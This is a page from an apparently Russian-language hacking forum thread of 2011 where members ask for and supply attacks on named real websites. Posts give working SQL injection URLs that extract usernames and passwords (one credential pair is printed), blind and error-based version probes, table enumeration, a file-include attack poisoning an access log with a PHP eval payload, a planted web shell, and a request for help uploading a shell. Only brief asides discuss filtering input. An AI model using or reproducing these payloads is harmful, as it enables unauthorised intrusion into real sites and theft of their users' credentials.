Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DIEZalok

    DIEZalok Banned

    Joined:
    22 Jan 2009
    Messages:
    14
    Likes Received:
    11
    Reputations:
    12
    Там фильтруется select(юнион кстати тоже)
    http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- - >> true
    http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- select >> false

    А без селекта ты ничего не добъешься, кроме вывода стандартных функций, ну узнаешь ты номер версии посимвольным перебором, и?


    http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&c=;
    user agent: <?php eval($_REQUEST['c']); ?>
    Ну а дальше масса вариантов.

    http://www.libertarias.com/wso.php

    Пасс держи в пм по понятным причинам, также по понятным причинам пришлось запороть оба лога.
    Cам инклюд в коде

    index.php
    PHP:
    $op $_GET['op'];
    //...
    if ($busqueda=="")     { 
                include(
    "op/$op.php");
    Тоже пофикшен, по понятным причинам, т.к. автор вопроса получил и ответ и шелл в пм.
     
    #16801 DIEZalok, 22 May 2011
    Last edited: 22 May 2011
    3 people like this.
  2. SaNn

    SaNn New Member

    Joined:
    17 Apr 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Shocked!
    Code:
    http://mctb.ru/forum?a=new'
    А что с этим можно сделать?
     
  3. DIEZalok

    DIEZalok Banned

    Joined:
    22 Jan 2009
    Messages:
    14
    Likes Received:
    11
    Reputations:
    12
    Ну раскрытие путей точно есть, дальше без кода сразу не определить.
    Я думаю тебе будет полезно(пробелы убрать):

    http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=5,1,2)) >>> true

    http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=4,1,2)) >>> false

    http://mctb.ru/comments/(0)and(select*from(select(name_const(version(),3)),name_const(version(),3))a)
     
    1 person likes this.
  4. SaNn

    SaNn New Member

    Joined:
    17 Apr 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Слушай, а где можно почитать, про то, что ты сделал?
    Вроде похоже на SQL инъекцию. Но хоть ты убей не могу понять, как она тут работает...
     
    #16804 SaNn, 23 May 2011
    Last edited: 23 May 2011
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
  6. SaNn

    SaNn New Member

    Joined:
    17 Apr 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
  7. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Ни в чем это всего лишь mod_rewrite, т.е. ЧПУ (человеко понятные ссылки), по всей своей логике, скорее всего /comments/1 будет обрабатываться как .php?comments=1
     
    _________________________
    1 person likes this.
  8. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Но кроме этого, mod_rewrite может поддерживать передачу цифр, а так называемый обход ЧПУ позволит подставлять всё что угодно, так что надеться на это не нужно и фильтровать данные в любом случае. Яркий пример - DLink.
     
  9. kartes1984

    kartes1984 New Member

    Joined:
    16 May 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    проблема в следуйщем не могу вывести нужные колонки
    http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%29,4,5+from+plus_signup+--
    в чем ошибка
     
  10. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%29,4,5+from+test_db.plus_signup+--

    jeff;123456
     
  11. skM

    skM New Member

    Joined:
    27 Jun 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    "У" ?
     
  12. Lindows

    Lindows Member

    Joined:
    2 Nov 2009
    Messages:
    11
    Likes Received:
    11
    Reputations:
    7
    "урлы" - урл - URL
     
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    ммм... как это: "mod_rewrite может поддерживать передачу цифр"?

    mod_rewrite это модуль, который преобразует урл по правилам прописанными в директиве RewriteRule, и передаваться могут те символы, которые указаны в правиле.

    так же может использоваться как mod_rewrite так и самопальный роутер на php

    вариантов масса, и как таковой "обход ЧПУ", это очень смутный вид/метод атаки (если это можно так назвать)

    получаемые данные, они на то и получаемые данные, что их можно модифицировать, и если их не фильтровать, безопасность сайта находится под угрозой, а каким способом они будут передаваться разницы нет, будь то _GET, _POST, _COOKIE, _SESSION, преобразованные из URL методами mod_rewrite или роутером.
     
    _________________________
  14. kartes1984

    kartes1984 New Member

    Joined:
    16 May 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    не получается просмотреть таблицы
    http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,3,group_concat%28table_name%29,5+FROM+information_schema.tables+WHERE+table_schema=0x7765626d6e675f70726f64756374
    база данных webmng_product
     
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://www.gideons.com.my/news_process.php?id=(0)union/*!all*/select(1),2,3,group_concat(table_name,0x3a,column_name+separator+0x3c62723e),(5)from(information_schema.columns)where(table_schema=0x7765626D6E675F70726F6475637473)--+
     
    _________________________
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,group_concat(0x0b,table_name),4,5+from+information_schema.tables+where+table_schema=0x7765626d6e675f70726f6475637473+--+

    gallery,
    gallery_group,
    news,
    product_category,
    products_detail
     
  17. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Подскажите, есть ли здесь инклуд?


     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    незнаю как там с инклудом, но скуль есть:
    [email protected]:5.0.92-community:worldbus_chinese
     
    _________________________
    1 person likes this.
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Нету там инклюда.
    А вообще определить есть ли инклюд или нету можно так:
    Попробуй перед значением подставить: ./ или / Если контент не изменился, то вполне возможно что инклюд.
    PHP:
    <?php
    include('cat/'.$_GET['page'].'.php'); // cat/blabla.php - true
    include('cat/'.$_GET['page'].'.php'); // cat//blabla.php - true
    include('cat/'.$_GET['page'].'.php'); // cat/./blabla.php - true
    include('cat/'.$_GET['page'].'.php'); // cat/blabla/.php - FALSE
    ?>
    Если примерна такая картинка, то инклюд есть.
    Это не беря в расчет всякие там филтры, которые могут обрезать "/" и т.д..
     
    #16819 Tigger, 23 May 2011
    Last edited: 23 May 2011
    1 person likes this.
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    подскажите как правильно залить шелл:
    делаю так
    создается файл:userfiles/1.php с содержимым
    но как пхп не отоброжается, что можно сделать в такой ситуации?
     
    _________________________
Thread Status:
Not open for further replies.